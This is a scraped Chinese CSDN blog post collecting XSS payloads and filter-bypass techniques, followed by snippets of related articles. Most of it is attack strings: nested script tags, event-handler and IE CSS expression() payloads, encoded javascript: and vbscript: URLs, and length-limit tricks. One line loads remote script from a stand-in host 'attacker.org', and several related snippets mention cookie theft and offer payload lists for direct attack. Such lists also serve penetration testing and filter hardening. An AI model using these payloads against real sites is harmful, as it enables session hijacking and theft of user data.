xss绕过,payload全集

最新推荐文章于 2024-11-08 23:09:50 发布
最新推荐文章于 2024-11-08 23:09:50 发布
阅读量2.3w 收藏 101
点赞数 10
CC 4.0 BY-SA版权
分类专栏: xss 文章标签: xss payload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/spang_33/article/details/80930046

XSS总结:

        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.youkuaiyun.com/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。
<img src=x onerror=alert(1)>
通杀标签payload:
<aaaa id="c" onfocus="alert(1)" tabindex=0>
1、script标签
绕过进行一次移除操作:
<scr<script>ipt>alert("XSS")</scr<script>ipt>
Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:
<script>alert("XSS")</script>
<script src=" http://attacker.org/malicious.js"></script>

1.2 JavaScript 事件
我们可以像如下这样在元素中定义   JavaScript  事件:
<div onclick="alert('xss')">
这个 JavaScript 代码当有人点击它后就会被执行,同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了,但是依旧还有少量事件没有被过滤,例如,onmouseenter 事件:<divonmouseenter="alert('xss')">当用户鼠标移动到 div 上时就会触发我们的代码。
另一个绕过的办法就是在属性和= 之间插入一个空格:
<div onclick ="alert('xss')">

1.3 行内样式(Inlinestyle)
我们同样可以在行内样式里利用   IE 浏览器支持的动态特性://IE5之后才支持
<div style="color: expression(alert('XSS'))"> //experssion后执行的语句相当于javascript后执行的语句
过滤器会检查关键字 style,随后跟随的不能是 <,在随后是 expression:
/style=[^<]*((expression\s*?[<]∗?)|(behavior\s*:))[^<]*(?=\>)/Uis
所以,让我们需要把 < 放到其他地方:
<div style="color: '<'; color: expression(alert('XSS'))">

1.4 CSS import
IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行 JavaScript 代码了。
<style>
</style>
malicious.css:
body {
    color: expression(alert('XSS'));
}
为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过:
<style>
</style>
IE 浏览器会接受反斜杠,但是我们绕过了过滤器。
1.5 Javascript URL
链接标签里可以通过在 URL 中使用 javascript:… 来执行 JavaScript:
<a href="javascript:alert('test')">link</a>
上面的过滤会从代码中移除 javascript:,所以我们不能直接这么写代码。但我们可以尝试改变 javascript:的写法,使它依旧可以被浏览器执行但又不匹配正则表达式。首先来尝试下 URL 编码:
<a href=" Java&#115;cript:alert('xss')">link</a>
上面这段代码不匹配正则表达式,但是浏览器依旧会执行它,因为浏览器会首先进行 URL 解码操作。
另外,我们还可以使用 VBScript, 虽然它在 IE11 中被禁用了,但依旧可以运行在旧版本的 IE 或者启用兼容模式的 IE11 上。我们可以使用类似上面 JavaScript 的方式来插入 VBScript 代码:
<a href='vbscript:MsgBox("XSS")'>link</a>
'-confirm`1`-'
'-confirm(1)-'
1.6 利用字符编码
%c1;alert(/xss/);//

1.7 绕过长度限制
"onclick=alert(1)//
"><!--
--><script>alert(xss);<script>

1.8 使用<base>标签
<script>alert(navigator.userAgent)<script>
<script>alert(88199)</script>
<script>confirm(88199)</script>
<script>prompt(88199)</script>
最低0.47元/天 解锁文章

200万优质内容无限畅学
xss防护绕过方法
rasssel的博客
07-11 1076
Payload技术类型优势常见用途绕过能力最基础脚本注入简单、直观用于初步测试 XSS 是否存在易被过滤利用事件触发兼容性强输入框、HTML属性中注入绕过<script>过滤非主流标签 + 属性HTML5 支持好可混淆绕过高级防护绕过技巧URL 中不能直接包含某些字符(如空格、中文、原字符URL 编码示例%3C<script>→%3E%2F/script→%2Fscript如果服务器未对 URL 编码内容进行检测,就会被绕过
3.2.1初探XSS Payload
wojiushilsy的博客
06-26 840
XSS 攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为"XSS Payload"。 XSS Payload实际上就是JavaScript脚本(还可以是Flash或其他富客户端的脚本),所以任何JavaScript脚本能实现的功能,XSS Payload都能做到。 一个最常见的XSS Payload,就是通过读取浏览器对象,从而发起“Cookie劫持”攻击。 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
XSS常用Payload
z2560088的博客
01-11 9966
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
XSS漏洞--常用payload绕过
最新发布
m0_56019217的博客
11-08 1396
代码的作用是保存从目标服务器盗取的Cookie。
终极万能XSS Payload
None安全团队
03-10 6912
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
XSS过滤绕过手法与加载payload
NZXHJ的博客
07-29 2129
关于各类XSS注入过滤的绕过手法,以及利用XSS平台加载注入payload讲解
xss payload.pdf
10-27
PortSwigger研究中心发布的XSS payload cheat sheet(XSS攻击载荷速查表)列举了多种攻击载荷向量,这些向量可以帮助攻击者绕过Web应用防火墙(WAF)和过滤器。这些向量按照事件类型、标签或浏览器进行分类,并为每...
XSS Payload绕过云锁学习
KHOST的博客
10-13 1341
前言 对于我这个菜鸟来说,我通过谷歌百度学习到很多前辈的资料,甚至每句话都是他的指导,我也很感激前辈的为我们铺设的道路,让我们更快的成长起来。我也乐于分享,可能有些知识点过于单调或者久远,请见谅。 WAF 前几天花了10买了一个月的服务器,换个WAF来测试。 Bypass 遗漏标签就不测试了,上一篇水文[https://www.anquanke.com/post/id/176185...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
XSS----payload绕过xss小游戏记录
diecai2192的博客
05-02 653
一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码。 1.xss实例代码: test.html <!DOCTYPE html> <head> <title>xss_test</title> </head> <body> <for...
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss payload
weixin_33701564的博客
06-29 422
><SCRIPT>alert("hello")</SCRIPT> 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/08/13/1545474.html
XSS payload (大集合)
m0_51186260的博客
10-18 3531
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
XSS-Payload大全
gy1bubble的博客
10-11 1834
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
XSS payload 大全
08-01 512
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL <a href="javascript:alert('test')">link</a> <a href="java&#115;cript:alert('xss')">link</a> <a href='vbscri...
xss payload大全(实用)
热门推荐
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值